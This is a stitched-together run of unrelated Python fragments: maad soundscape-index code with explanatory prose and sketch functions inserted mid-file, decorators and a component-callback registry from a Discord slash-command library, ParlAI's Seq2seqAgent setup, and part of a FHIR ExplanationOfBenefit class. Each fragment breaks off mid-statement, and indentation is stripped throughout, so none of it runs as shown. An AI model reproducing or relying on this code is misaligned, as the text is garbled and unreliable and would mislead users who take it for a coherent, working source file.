#wave = iir_filter1d(wave,fs,fcut=10,forder=10,fname='butter',ftype='highpass')
#### Envelope (mode fast => see TOWSEY)
env = maad.ecoacoustics.envelope(wave, mode=MODE_ENV, N=Nt)
envdB = maad.util.linear2dB(env, mode='amplitude')
# time step
if MODE_ENV == 'fast': dt_env = 1 / fs * Nt
if MODE_ENV == 'hilbert': dt_env = 1 / fs
# Time vector
WAVE_DURATION = len(wave)/fs
tn = np.arange(0,len(env),1)*WAVE_DURATION/len(env)
#### Background noise estimation
"""BGNt [TOWSEY] """
BKdB_t = maad.util.get_unimode(envdB, mode='ale', axis=1, verbose=False, display=False)
BK_t = maad.util.dB2linear(BKdB_t, db_gain=dB_GAIN, mode='amplitude')  # transform bgn in dB back to amplitude
BGNt = BKdB_t
#### Signal to Noise ratio estimation
""" SNRt [TOWSEY] """
SNRt = max(envdB) - BGNt
#### Env in dB without noise
envdBSansNoise = envdB - BKdB_t
envdBSansNoise[envdBSansNoise < 0] = 0
# Display the wave, the envelope and the background noise (red line),
# in linear and dB scale
if DISPLAY :
# linear representation
fig1, ax1 = plt.subplots()
ax1.plot(tn, env, lw=0.2, alpha=1)
ax1.fill_between(tn,env,0, alpha=0.5)
ax1.axhline(BK_t, color='red', lw=1, alpha=0.5)
ax1.set_title('Waveform, envelope and background noise')
ax1.set_xlabel('Time [sec]')
# dB representation
fig2, ax2 = plt.subplots()
ax2.fill_between(tn,envdB,-50, alpha=0.75)
ax2.axhline(BKdB_t, color='red', lw=1, alpha=0.5)
ax2.set_title('Envelope in dB and background noise')
ax2.set_xlabel('Time [sec]')
# dB representation
fig3, ax3 = plt.subplots()
ax3.fill_between(tn,envdBSansNoise,0, alpha=0.75)
ax3.set_title('Envelope in dB without background noise')
ax3.set_xlabel('Time [sec]')
#### Median
"""
COMMENT : Result is slightly different due to a different Hilbert implementation
"""
MED = median(env)
print("median %2.5f" % MED)
""" =======================================================================
ENTROPY : Entropy is a measure of ENERGY dispersal => square the amplitude.
TEMPORAL ENTROPY => a value < 0.7 indicates a brief concentration of energy
(a few seconds);
a value close to 1 indicates no peak events but rather
a smooth sound or noise.
======================================================================= """
#### temporal entropy from the envelope's amplitude [SUEUR] or energy [TOWSEY]
""" ENT [TOWSEY] """
"""
COMMENT : Result is slightly different due to a different envelope
estimation implementation
"""
Ht = maad.ecoacoustics.entropy(env**2)
ENT = 1 - Ht
print("Ht %2.5f" % Ht)
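The temporal entropy above is computed by maad.ecoacoustics.entropy; as a minimal standalone sketch of the same idea (Shannon entropy of the normalized energy envelope, scaled to [0, 1]), with hypothetical names and a plain numpy vector:

```python
import numpy as np

def temporal_entropy(env):
    # Turn the squared envelope into a probability mass function,
    # then take Shannon entropy scaled by log(N) so the result is in [0, 1].
    energy = np.asarray(env, dtype=float) ** 2
    p = energy / energy.sum()
    p = p[p > 0]  # drop zero bins to avoid log(0)
    return float(-(p * np.log(p)).sum() / np.log(energy.size))
```

A flat envelope gives entropy close to 1, while a single transient gives a value close to 0, which is why the script reports ENT = 1 - Ht as a "peakiness" index.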
"""**************************** Activity *******************************"""
""" ACT & EVN [TOWSEY] """
ACTtFraction, ACTtCount, ACTtMean = maad.ecoacoustics.acoustic_activity (envdBSansNoise,
dB_threshold=6, axis=0)
EVNtSum, EVNtMean, EVNtCount, EVNt = maad.ecoacoustics.acoustic_events (envdBSansNoise,
dB_threshold=6,
dt=dt_env, rejectDuration=None)
ACT = ACTtFraction
EVN = EVNtMean
# display a portion of the signal (0,20)
if DISPLAY :
fig3, ax3 = plt.subplots()
ax3.plot(tn, env/max(abs(env)), lw=0.5, alpha=1)
plt.fill_between(tn, 0, EVNt*1,color='red',alpha=0.5)
ax3.set_title('Detected Events from the envelope without noise')
ax3.set_xlabel('Time [sec]')
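maad.ecoacoustics.acoustic_activity above returns, among other things, the fraction of frames whose denoised level exceeds the dB threshold. A hypothetical minimal version of that fraction (names are illustrative, not the maad API):

```python
import numpy as np

def activity_fraction(env_db_no_noise, db_threshold=6.0):
    # Fraction of envelope frames above the dB threshold, computed on the
    # noise-subtracted envelope so the threshold is relative to background.
    env = np.asarray(env_db_no_noise, dtype=float)
    return float((env > db_threshold).mean())
```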
""" =======================================================================
===========================================================================
Computation in the frequency domain
===========================================================================
========================================================================"""
#### spectrogram => mode : 'amplitude' or 'psd'
PSDxx,tn,fn,_ = maad.sound.spectrogramPSD (wave, fs,
window=WIN, noverlap=NOVLP, nfft=N,
fcrop=None, tcrop=None,
verbose=False, display=DISPLAY,
savefig = None)
# index of the selected bandwidth
iANTHRO_BAND = maad.ecoacoustics.index_bw(fn,ANTHRO_BAND)
iBIO_BAND = maad.ecoacoustics.index_bw(fn,BIO_BAND)
iINSECT_BAND = maad.ecoacoustics.index_bw(fn,INSECT_BAND)
""" ******************** TO CHECK """
#### Smoothing of the spectrogram (like TOWSEY)
#PSDxx = fir_filter(PSDxx,kernel=('boxcar',3), axis=1)
#PSDxx = fir_filter(PSDxx,kernel=('boxcar',3), axis=0)
""" ******************** END TO CHECK """
#### PSD spectrogram PSDxx to amplitude spectrogram Sxx
Sxx = sqrt(PSDxx)
#### Average Spectrum and PSD (better to compute the mean on the PSD)
mean_PSD = mean(PSDxx, axis = 1)
#### convert into dB
SxxdB = maad.util.linear2dB(Sxx, mode='amplitude')
PSDxxdB = maad.util.linear2dB(PSDxx, mode ='power')
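The linear2dB / dB2linear pair used throughout differs only in the scaling factor: 20·log10 for amplitude quantities, 10·log10 for power quantities. A self-contained sketch of that convention (function names hypothetical; maad.util.linear2dB also accepts a db_gain, omitted here):

```python
import numpy as np

def linear2db(x, mode="amplitude"):
    # 20*log10 for amplitude quantities, 10*log10 for power quantities
    factor = 20.0 if mode == "amplitude" else 10.0
    return factor * np.log10(x)

def db2linear(x_db, mode="amplitude"):
    # Inverse of linear2db with the same factor convention
    factor = 20.0 if mode == "amplitude" else 10.0
    return 10.0 ** (np.asarray(x_db, dtype=float) / factor)
```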
# display MEAN PSD SPECTROGRAM in dB [anthropological and Biological bands]
if DISPLAY :
fig5, ax5 = plt.subplots()
ax5.plot(fn[iANTHRO_BAND],
maad.util.linear2dB(mean_PSD[iANTHRO_BAND], mode ='power'),
color='#555555', lw=2, alpha=1)
ax5.plot(fn[iBIO_BAND],
maad.util.linear2dB(mean_PSD[iBIO_BAND], mode ='power'),
color='#55DD00', lw=2, alpha=1)
ax5.plot(fn[iINSECT_BAND],
maad.util.linear2dB(mean_PSD[iINSECT_BAND], mode ='power'),
color='#DDDC00', lw=2, alpha=1)
#### Noise estimation
"""BGNf [TOWSEY] """
"""
COMMENT : Result is slightly different due to smoothing
"""
BKdB_f = maad.util.get_unimode (PSDxxdB, mode ='ale', axis=1,
verbose=False, display=False)
""" ******************** TO CHECK """
# smooth the noise profile
#BKdB_f = fir_filter(BKdB_f,kernel=('boxcar', 3), axis=0)
""" ******************** TO CHECK """
BGNf = BKdB_f
if DISPLAY :
ax5.plot(fn[iANTHRO_BAND],
BKdB_f[iANTHRO_BAND], 'r--', lw=2, alpha=0.5)
ax5.plot(fn[iBIO_BAND],
BKdB_f[iBIO_BAND], 'r--', lw=2, alpha=0.5)
ax5.plot(fn[iINSECT_BAND],
BKdB_f[iINSECT_BAND], 'r--', lw=2, alpha=0.5)
ax5.set_title('Mean PSD and uniform background noise (dash)')
ax5.set_xlabel('Frequency [Hz]')
ax5.axis('tight')
""" Parseval : energy conservation from temporal domain to frequency domain """
print ('Parseval : energy conservation from temporal domain to frequency domain')
print ('=> if N < 4096, the conservation is not preserved due to noise')
energy_wav = sum(wave**2)
print ('NRJ from wav : %2.5f' % energy_wav)
energy_PSD = sum(PSDxx/PSDxx.shape[1]*len(wave))
print ('NRJ from PSDxy : %2.5f' % energy_PSD)
energy_PSD2 = sum(mean_PSD*len(wave))
print ('NRJ from mean(PSDxy) : %2.5f' % energy_PSD2)
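The Parseval check above compares time-domain energy with energy recovered from the PSD. The underlying identity can be verified with a bare FFT, independent of the maad spectrogram parameters (with a windowed, overlapping STFT the equality only holds after compensating for window energy and overlap, which is one reason the script's check is only approximate):

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.standard_normal(1024)
X = np.fft.fft(x)

# Parseval's theorem: sum(x^2) == sum(|X|^2) / N
energy_time = float(np.sum(x ** 2))
energy_freq = float(np.sum(np.abs(X) ** 2) / x.size)
```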
#### Signal to Noise ratio estimation
""" SNRf [TOWSEY] """
SNRf = max(PSDxxdB[iBIO_BAND]) - maad.util.linear2dB(mean(maad.util.dB2linear(BKdB_f[iBIO_BAND], mode='power')),mode='power')
""" Spectrogram in dB without noise """
# Remove background noise (BGNf is an estimation) and negative value to zero
PSDxxdB_SansNoise = PSDxxdB - BKdB_f[..., np.newaxis]
PSDxxdB_SansNoise[PSDxxdB_SansNoise < 0] = 0
""" ******************** OPTION TO CHECK """
# # TOWSEY : smooth the spectro and set value lower than threshold (2dB in Towsey
# # here the threshold is evaluated as the background value) to 0
# SxxdB_SansNoise_smooth = maad.sound.fir_filter(SxxdB_SansNoise,kernel=('boxcar',3), axis=0)
# SxxdB_SansNoise_smooth = maad.sound.fir_filter(SxxdB_SansNoise_smooth,kernel=('boxcar',3), axis=1)
# thresh = filters.threshold_li(SxxdB_SansNoise_smooth)
# SxxdB_SansNoise[SxxdB_SansNoise_smooth<thresh] =_MIN_
""" ******************** OPTION TO CHECK """
# Conversion dB to linear
PSDxx_SansNoise = maad.util.dB2linear(PSDxxdB_SansNoise, | |
None,
connector: dict = None,
):
"""
Decorator that registers a coroutine as a slash command.\n
All decorator args must be passed as keyword-only args.\n
The command coroutine requires 1 arg for ctx (:class:`.model.SlashContext`),
and if your slash command has some args, then those args are also required.\n
All args must be passed as keyword-args.
.. note::
If you don't pass `options` but your coroutine has extra args, then options will be generated automatically.
However, this is not recommended, since the descriptions will be "No Description." or the command's description.
.. warning::
Unlike discord.py's command, ``*args``, keyword-only args, converters, etc. are not supported or behave differently.
Example:
.. code-block:: python
@slash.slash(name="ping")
async def _slash(ctx): # Normal usage.
await ctx.send(content=f"Pong! (`{round(bot.latency*1000)}`ms)")
@slash.slash(name="pick")
async def _pick(ctx, choice1, choice2): # Command with 1 or more args.
await ctx.send(content=str(random.choice([choice1, choice2])))
To format the connector, follow this example.
.. code-block:: python
{
"example-arg": "example_arg",
"시간": "hour"
# A connector is required when an option parameter name
# uses a language other than English.
}
Set the Discord UI's parameter name as the key, and the command coroutine's arg name as the value.
:param name: Name of the slash command. Default name of the coroutine.
:type name: str
:param description: Description of the slash command. Default ``None``.
:type description: str
:param guild_ids: List of guild IDs where the command will be used. Default ``None``, which makes the command global.
:type guild_ids: List[int]
:param options: Options of the slash command. This will affect ``auto_convert`` and command data at Discord API. Default ``None``.
:type options: List[dict]
:param default_permission: Sets if users have permission to run slash command by default, when no permissions are set. Default ``True``.
:type default_permission: bool
:param permissions: Permission requirements of the slash command. Default ``None``.
:type permissions: dict
:param connector: Kwargs connector for the command. Default ``None``.
:type connector: dict
"""
if not permissions:
permissions = {}
def wrapper(cmd):
decorator_permissions = getattr(cmd, "__permissions__", None)
if decorator_permissions:
permissions.update(decorator_permissions)
obj = self.add_slash_command(
cmd,
name,
description,
guild_ids,
options,
default_permission,
permissions,
connector,
)
return obj
return wrapper
def subcommand(
self,
*,
base,
subcommand_group=None,
name=None,
description: str = None,
base_description: str = None,
base_desc: str = None,
base_default_permission: bool = True,
base_permissions: dict = None,
subcommand_group_description: str = None,
sub_group_desc: str = None,
guild_ids: typing.List[int] = None,
options: typing.List[dict] = None,
connector: dict = None,
):
"""
Decorator that registers a subcommand.\n
Unlike discord.py, you don't need a base command.\n
All args must be passed as keyword-args.
.. note::
If you don't pass `options` but your coroutine has extra args, then options will be generated automatically.
However, this is not recommended, since the descriptions will be "No Description." or the command's description.
.. warning::
Unlike discord.py's command, ``*args``, keyword-only args, converters, etc. are not supported or behave differently.
Example:
.. code-block:: python
# /group say <str>
@slash.subcommand(base="group", name="say")
async def _group_say(ctx, _str):
await ctx.send(content=_str)
# /group kick user <user>
@slash.subcommand(base="group",
subcommand_group="kick",
name="user")
async def _group_kick_user(ctx, user):
...
:param base: Name of the base command.
:type base: str
:param subcommand_group: Name of the subcommand group, if any. Default ``None`` which represents there is no sub group.
:type subcommand_group: str
:param name: Name of the subcommand. Default name of the coroutine.
:type name: str
:param description: Description of the subcommand. Default ``None``.
:type description: str
:param base_description: Description of the base command. Default ``None``.
:type base_description: str
:param base_desc: Alias of ``base_description``.
:param base_default_permission: Sets if users have permission to run the base command by default, when no permissions are set. Default ``True``.
:type base_default_permission: bool
:param base_permissions: Permission requirements of the base command. Default ``None``.
:type base_permissions: dict
:param subcommand_group_description: Description of the subcommand_group. Default ``None``.
:type subcommand_group_description: str
:param sub_group_desc: Alias of ``subcommand_group_description``.
:param guild_ids: List of guild IDs where the command will be used. Default ``None``, which makes the command global.
:type guild_ids: List[int]
:param options: Options of the subcommand. This will affect ``auto_convert`` and command data at Discord API. Default ``None``.
:type options: List[dict]
:param connector: Kwargs connector for the command. Default ``None``.
:type connector: dict
"""
base_description = base_description or base_desc
subcommand_group_description = subcommand_group_description or sub_group_desc
if not base_permissions:
base_permissions = {}
def wrapper(cmd):
decorator_permissions = getattr(cmd, "__permissions__", None)
if decorator_permissions:
base_permissions.update(decorator_permissions)
obj = self.add_subcommand(
cmd,
base,
subcommand_group,
name,
description,
base_description,
base_default_permission,
base_permissions,
subcommand_group_description,
guild_ids,
options,
connector,
)
return obj
return wrapper
def permission(self, guild_id: int, permissions: list):
"""
Decorator that adds permissions. This sets the permissions for a single guild; you can use it more than once per command.
:param guild_id: ID of the guild for the permissions.
:type guild_id: int
:param permissions: List of permissions to be set for the specified guild.
:type permissions: list
"""
def wrapper(cmd):
if not getattr(cmd, "__permissions__", None):
cmd.__permissions__ = {}
cmd.__permissions__[guild_id] = permissions
return cmd
return wrapper
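The decorator above stores per-guild permissions as metadata on the coroutine object itself, to be picked up later by the ``slash``/``subcommand`` decorators via ``getattr(cmd, "__permissions__", None)``. The pattern in isolation, as a runnable sketch with plain functions instead of coroutines:

```python
def permission(guild_id, permissions):
    # Stack permissions on the function object; a later registration
    # decorator reads them back via getattr(cmd, "__permissions__", None).
    def wrapper(cmd):
        if not getattr(cmd, "__permissions__", None):
            cmd.__permissions__ = {}
        cmd.__permissions__[guild_id] = permissions
        return cmd
    return wrapper

@permission(111, ["allow-role-a"])
@permission(222, ["deny-role-b"])
def fake_command():
    pass
```

Because decorators apply bottom-up, stacking several ``@permission`` lines accumulates one entry per guild in the same dict.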
def add_component_callback(
self,
callback: typing.Coroutine,
*,
messages: typing.Union[int, discord.Message, list] = None,
components: typing.Union[str, dict, list] = None,
use_callback_name=True,
component_type: int = None,
):
"""
Adds a coroutine callback to a component.
A callback can be made to accept only component interactions from specific
messages and/or components with specific custom_ids.
:param Coroutine callback: The coroutine to be called when the component is interacted with. Must accept a single argument with the type :class:`.context.ComponentContext`.
:param messages: If specified, only interactions from the given messages will be accepted. Can be a message object, a message ID, or a list of the previous two. An empty list means that no interactions are accepted.
:type messages: Union[discord.Message, int, list]
:param components: If specified, only interactions with the ``custom_id`` of the given components will be accepted. Defaults to the name of ``callback`` if ``use_callback_name=True``. Can be a custom ID (str), a component dict (actionrow or button), or a list of the previous two.
:type components: Union[str, dict, list]
:param use_callback_name: Whether the ``custom_id`` defaults to the name of ``callback`` if unspecified. If ``False``, either ``messages`` or ``components`` must be specified.
:type use_callback_name: bool
:param component_type: The type of the component to avoid collisions with other component types. See :class:`.model.ComponentType`.
:type component_type: Optional[int]
:raises: .error.DuplicateCustomID, .error.IncorrectFormat
"""
message_ids = list(get_messages_ids(messages)) if messages is not None else [None]
custom_ids = list(get_components_ids(components)) if components is not None else [None]
if use_callback_name and custom_ids == [None]:
custom_ids = [callback.__name__]
if message_ids == [None] and custom_ids == [None]:
raise error.IncorrectFormat("You must specify messages or components (or both)")
callback_obj = model.ComponentCallbackObject(
callback, message_ids, custom_ids, component_type
)
self._add_comp_callback_obj(callback_obj)
return callback_obj
def _add_comp_callback_obj(self, callback_obj):
component_type = callback_obj.component_type
for message_id, custom_id in callback_obj.keys:
self._register_comp_callback_obj(callback_obj, message_id, custom_id, component_type)
def _register_comp_callback_obj(self, callback_obj, message_id, custom_id, component_type):
message_id_dict = self.components
custom_id_dict = message_id_dict.setdefault(message_id, {})
component_type_dict = custom_id_dict.setdefault(custom_id, {})
if component_type in component_type_dict:
raise error.DuplicateCallback(message_id, custom_id, component_type)
component_type_dict[component_type] = callback_obj
self.logger.debug(
f"Added component callback for "
f"message ID {message_id or '<any>'}, "
f"custom_id `{custom_id or '<any>'}`, "
f"component_type `{component_type or '<any>'}`"
)
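``_register_comp_callback_obj`` builds a three-level dict keyed by message ID, custom_id, and component type, creating intermediate dicts on demand with ``setdefault`` and rejecting duplicates. A minimal standalone version of that registry logic (names hypothetical):

```python
def register(registry, message_id, custom_id, component_type, obj):
    # registry[message_id][custom_id][component_type] = obj, with
    # intermediate dicts created on demand and duplicate keys rejected.
    by_custom_id = registry.setdefault(message_id, {})
    by_type = by_custom_id.setdefault(custom_id, {})
    if component_type in by_type:
        raise ValueError("duplicate callback for this key combination")
    by_type[component_type] = obj

registry = {}
register(registry, 123, "confirm", 2, "callback_obj")
```

Using ``None`` at any level acts as a wildcard key, which is how the library matches "any message" or "any custom_id".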
def extend_component_callback(
self,
callback_obj: model.ComponentCallbackObject,
message_id: int = None,
custom_id: str = None,
):
"""
Registers an existing callback object (:class:`.model.ComponentCallbackObject`)
for a specific combination of message_id, custom_id, and component_type.
:param callback_obj: callback object.
:type callback_obj: model.ComponentCallbackObject
:param message_id: The message ID to register the callback for, if any.
:type message_id: Optional[int]
:param custom_id: The ``custom_id`` of the component.
:type custom_id: Optional[str]
:raises: .error.DuplicateCustomID, .error.IncorrectFormat
"""
component_type = callback_obj.component_type
self._register_comp_callback_obj(callback_obj, message_id, custom_id, component_type)
callback_obj.keys.add((message_id, custom_id))
def get_component_callback(
self,
message_id: int = None,
custom_id: str = None,
component_type: int = None,
):
"""
Returns the component callback (or ``None`` if not found) for a specific combination of message_id, custom_id, and component_type.
:param message_id: The message ID to look up the callback for, if any.
:type message_id: Optional[int]
:param custom_id: The ``custom_id`` of the component.
:type custom_id: Optional[str]
:param component_type: The type of the component. See :class:`.model.ComponentType`.
:type component_type: Optional[int]
:return: Optional[model.ComponentCallbackObject]
"""
message_id_dict = self.components
try:
custom_id_dict = _get_val(message_id_dict, message_id)
component_type_dict = _get_val(custom_id_dict, custom_id)
callback = _get_val(component_type_dict, component_type)
| |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .torch_agent_v1 import TorchAgent, Output, Beam
from .utils_v1 import padded_tensor
from .utils_v0 import SharedTable, round_sigfigs
from .modules_v1 import Seq2seq, opt_to_kwargs
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import defaultdict
import os
import math
import json
import tempfile
class Seq2seqAgent(TorchAgent):
"""Agent which takes an input sequence and produces an output sequence.
This model supports encoding the input and decoding the output via one of
several flavors of RNN. It then uses a linear layer (whose weights can
be shared with the embedding layer) to convert RNN output states into
output tokens. This model supports greedy decoding, selecting the
highest probability token at each time step, as well as beam
search.
For more information, see the following papers:
- Neural Machine Translation by Jointly Learning to Align and Translate
`(Bahdanau et al. 2014) <arxiv.org/abs/1409.0473>`_
- Sequence to Sequence Learning with Neural Networks
`(Sutskever et al. 2014) <arxiv.org/abs/1409.3215>`_
- Effective Approaches to Attention-based Neural Machine Translation
`(Luong et al. 2015) <arxiv.org/abs/1508.04025>`_
"""
@classmethod
def add_cmdline_args(cls, argparser):
"""Add command-line arguments specifically for this agent."""
agent = argparser.add_argument_group('Seq2Seq Arguments')
agent.add_argument('--init-model', type=str, default=None,
help='load dict/model/opts from this path')
agent.add_argument('-hs', '--hiddensize', type=int, default=128,
help='size of the hidden layers')
agent.add_argument('-esz', '--embeddingsize', type=int, default=128,
help='size of the token embeddings')
agent.add_argument('-nl', '--numlayers', type=int, default=2,
help='number of hidden layers')
agent.add_argument('-dr', '--dropout', type=float, default=0.1,
help='dropout rate')
agent.add_argument('-bi', '--bidirectional', type='bool',
default=False,
help='whether to encode the context with a '
'bidirectional rnn')
agent.add_argument('-att', '--attention', default='none',
choices=['none', 'concat', 'general', 'dot',
'local'],
help='Choices: none, concat, general, dot, local. '
'If set local, also set attention-length. '
'(see arxiv.org/abs/1508.04025)')
agent.add_argument('-attl', '--attention-length', default=48, type=int,
help='Length of local attention.')
agent.add_argument('--attention-time', default='post',
choices=['pre', 'post'],
help='Whether to apply attention before or after '
'decoding.')
agent.add_argument('-rnn', '--rnn-class', default='lstm',
choices=Seq2seq.RNN_OPTS.keys(),
help='Choose between different types of RNNs.')
agent.add_argument('-dec', '--decoder', default='same',
choices=['same', 'shared'],
help='Choose between different decoder modules. '
'Default "same" uses same class as encoder, '
'while "shared" also uses the same weights. '
'Note that shared disables some encoder '
'options--in particular, bidirectionality.')
agent.add_argument('-lt', '--lookuptable', default='unique',
choices=['unique', 'enc_dec', 'dec_out', 'all'],
help='The encoder, decoder, and output modules can '
'share weights, or not. '
'Unique has independent embeddings for each. '
'Enc_dec shares the embedding for the encoder '
'and decoder. '
'Dec_out shares decoder embedding and output '
'weights. '
'All shares all three weights.')
agent.add_argument('-soft', '--numsoftmax', default=1, type=int,
help='default 1, if greater than 1 then uses mixture of '
'softmax (see arxiv.org/abs/1711.03953).')
agent.add_argument('--beam-size', type=int, default=1,
help='Beam size, if 1 then greedy search')
agent.add_argument('--beam-dot-log', type='bool', default=False,
help='Dump beam trees as png dot images into /tmp folder')
agent.add_argument('--beam-min-n-best', type=int, default=3,
help='Minimum number of nbest candidates to achieve '
'during the beam search')
agent.add_argument('--beam-min-length', type=int, default=3,
help='Minimum length of prediction to be generated by '
'the beam search')
agent.add_argument('-idr', '--input-dropout', type=float, default=0.0,
help='Each token from the input will be masked with'
' __unk__ token with this probability.')
agent.add_argument('--beam-block-ngram', type=int, default=0,
help='Block all repeating ngrams up to history length n-1')
TorchAgent.add_cmdline_args(argparser)
Seq2seqAgent.dictionary_class().add_cmdline_args(argparser)
return agent
@staticmethod
def model_version():
"""Return current version of this model, counting up from 0.
Models may not be backwards-compatible with older versions.
Version 1 split from version 0 on Aug 29, 2018.
To use version 0, use --model legacy:seq2seq:0
(legacy agent code is located in parlai/agents/legacy_agents).
"""
return 1
def __init__(self, opt, shared=None):
"""Set up model."""
init_model = None
if not shared: # only do this on first setup
# first check load path in case we need to override paths
if opt.get('init_model') and os.path.isfile(opt['init_model']):
# check first for 'init_model' for loading model from file
init_model = opt['init_model']
if opt.get('model_file') and os.path.isfile(opt['model_file']):
# next check for 'model_file', this would override init_model
init_model = opt['model_file']
if init_model is not None:
# if we are loading a model, should load its dict too
if (os.path.isfile(init_model + '.dict') or
opt['dict_file'] is None):
opt['dict_file'] = init_model + '.dict'
super().__init__(opt, shared)
opt = self.opt
# all instances may need some params
self.id = 'Seq2Seq'
self.multigpu = (opt.get('multigpu') and self.use_cuda and
(opt.get('batchsize') > 1))
states = {}
self.beam_dot_log = opt.get('beam_dot_log', False)
self.beam_size = opt.get('beam_size', 1)
self.beam_min_n_best = opt.get('beam_min_n_best', 3)
self.beam_min_length = opt.get('beam_min_length', 3)
self.beam_block_ngram = opt.get('beam_block_ngram', 0)
if shared:
# set up shared properties
self.model = shared['model']
self.metrics = shared['metrics']
states = shared.get('states', {})
else:
self.metrics = {'loss': 0.0, 'num_tokens': 0, 'correct_tokens': 0,
'total_skipped_batches': 0}
# this is not a shared instance of this class, so do full init
if self.beam_dot_log:
self.beam_dot_dir = tempfile.mkdtemp(
prefix='{}-beamdot-beamsize-{}-'.format(
os.path.basename(
opt.get('model_file')),
self.beam_size))
print(
'[ Saving dot beam logs in {} ]'.format(
self.beam_dot_dir))
if init_model is not None:
# load model parameters if available
print('[ Loading existing model params from {} ]'
''.format(init_model))
states = self.load(init_model)
self._init_model(states=states)
# set up criteria
if opt.get('numsoftmax', 1) > 1:
self.criterion = nn.NLLLoss(
ignore_index=self.NULL_IDX, size_average=False)
else:
self.criterion = nn.CrossEntropyLoss(
ignore_index=self.NULL_IDX, size_average=False)
if self.use_cuda:
self.criterion.cuda()
if 'train' in opt.get('datatype', ''):
self.init_optim(
[p for p in self.model.parameters() if p.requires_grad],
optim_states=states.get('optimizer'),
saved_optim_type=states.get('optimizer_type'))
self.reset()
def _init_model(self, states=None):
"""Initialize model, override to change model setup."""
opt = self.opt
kwargs = opt_to_kwargs(opt)
self.model = Seq2seq(
len(self.dict), opt['embeddingsize'], opt['hiddensize'],
padding_idx=self.NULL_IDX, start_idx=self.START_IDX,
unknown_idx=self.dict[self.dict.unk_token],
longest_label=states.get('longest_label', 1),
**kwargs)
if (opt.get('dict_tokenizer') == 'bpe' and
opt['embedding_type'] != 'random'):
print('skipping preinitialization of embeddings for bpe')
elif not states and opt['embedding_type'] != 'random':
# `not states`: only set up embeddings if not loading model
self._copy_embeddings(self.model.decoder.lt.weight,
opt['embedding_type'])
if opt['lookuptable'] in ['unique', 'dec_out']:
# also set encoder lt, since it's not shared
self._copy_embeddings(self.model.encoder.lt.weight,
opt['embedding_type'], log=False)
if states:
# set loaded states if applicable
self.model.load_state_dict(states['model'])
if opt['embedding_type'].endswith('fixed'):
print('Seq2seq: fixing embedding weights.')
self.model.decoder.lt.weight.requires_grad = False
self.model.encoder.lt.weight.requires_grad = False
if opt['lookuptable'] in ['dec_out', 'all']:
self.model.decoder.e2s.weight.requires_grad = False
if self.use_cuda:
self.model.cuda()
if self.multigpu:
self.model = torch.nn.DataParallel(self.model)
self.model.encoder = self.model.module.encoder
self.model.decoder = self.model.module.decoder
self.model.longest_label = self.model.module.longest_label
self.model.output = self.model.module.output
return self.model
def _v2t(self, vec):
"""Convert token indices to string of tokens."""
new_vec = []
if hasattr(vec, 'cpu'):
vec = vec.cpu()
for i in vec:
if i == self.END_IDX:
break
elif i != self.START_IDX:
new_vec.append(i)
return self.dict.vec2txt(new_vec)
def zero_grad(self):
"""Zero out optimizer."""
self.optimizer.zero_grad()
def update_params(self):
"""Do one optimization step."""
if self.clip > 0:
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)
self.optimizer.step()
def reset_metrics(self):
"""Reset metrics for reporting loss and perplexity."""
super().reset_metrics()
self.metrics['loss'] = 0.0
self.metrics['num_tokens'] = 0
self.metrics['correct_tokens'] = 0
def report(self):
"""Report loss and perplexity from model's perspective.
Note that this includes predicting __END__ and __UNK__ tokens and may
differ from a truly independent measurement.
"""
m = {}
num_tok = self.metrics['num_tokens']
if num_tok > 0:
if self.metrics['correct_tokens'] > 0:
m['token_acc'] = self.metrics['correct_tokens'] / num_tok
m['loss'] = self.metrics['loss'] / num_tok
try:
m['ppl'] = math.exp(m['loss'])
except OverflowError:
m['ppl'] = float('inf')
if self.metrics['total_skipped_batches'] > 0:
m['total_skipped_batches'] = self.metrics['total_skipped_batches']
for k, v in m.items():
# clean up: rounds to sigfigs and converts tensors to floats
m[k] = round_sigfigs(v, 4)
return m
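``report()`` above exponentiates the average per-token loss into perplexity, guarding against overflow. The computation in isolation (a sketch; the agent additionally rounds everything to significant figures):

```python
import math

def perplexity(total_loss, num_tokens):
    # ppl = exp(mean negative log-likelihood per token); very large losses
    # overflow math.exp, so report infinity instead of crashing.
    avg_loss = total_loss / num_tokens
    try:
        return math.exp(avg_loss)
    except OverflowError:
        return float("inf")
```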
def share(self):
"""Share internal states between parent and child instances."""
shared = super().share()
shared['model'] = self.model
if self.opt.get('numthreads', 1) > 1:
# we're doing hogwild so share the model too
if isinstance(self.metrics, dict):
# move metrics and model to shared memory
self.metrics = SharedTable(self.metrics)
self.model.share_memory()
shared['states'] = { # don't share optimizer states
'optimizer_type': self.opt['optimizer'],
}
shared['metrics'] = self.metrics # do after numthreads check
if self.beam_dot_log is True:
shared['beam_dot_dir'] = self.beam_dot_dir
return shared
def vectorize(self, *args, **kwargs):
"""Override vectorize for seq2seq."""
kwargs['add_start'] = False # model does this in module code
kwargs['add_end'] = True # we do want this
return super().vectorize(*args, **kwargs)
def batchify(self, *args, **kwargs):
"""Override batchify options for seq2seq."""
kwargs['sort'] = True # need sorted for pack_padded
return super().batchify(*args, **kwargs)
def _init_cuda_buffer(self, model, criterion, batchsize, maxlen):
"""Pre-initialize CUDA buffer by doing fake forward pass."""
if self.use_cuda and not hasattr(self, 'buffer_initialized'):
try:
print('preinitializing pytorch cuda buffer')
dummy = torch.ones(batchsize, maxlen).long().cuda()
out = model(dummy, dummy)
sc = out[0] # scores
loss = criterion(sc.view(-1, sc.size(-1)), dummy.view(-1))
loss.backward()
self.buffer_initialized = True
except RuntimeError as e:
if 'out of | |
"""
self.unit = None
""" Individual or family.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(ExplanationOfBenefitBenefitBalance, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitBenefitBalance, self).elementProperties()
js.extend([
("category", "category", codeableconcept.CodeableConcept, False, None, True),
("description", "description", str, False, None, False),
("excluded", "excluded", bool, False, None, False),
("financial", "financial", ExplanationOfBenefitBenefitBalanceFinancial, True, None, False),
("name", "name", str, False, None, False),
("network", "network", codeableconcept.CodeableConcept, False, None, False),
("term", "term", codeableconcept.CodeableConcept, False, None, False),
("unit", "unit", codeableconcept.CodeableConcept, False, None, False),
])
return js
class ExplanationOfBenefitBenefitBalanceFinancial(backboneelement.BackboneElement):
""" Benefit Summary.
Benefits used to date.
"""
resource_type = "ExplanationOfBenefitBenefitBalanceFinancial"
def __init__(self, jsondict=None, strict=True):
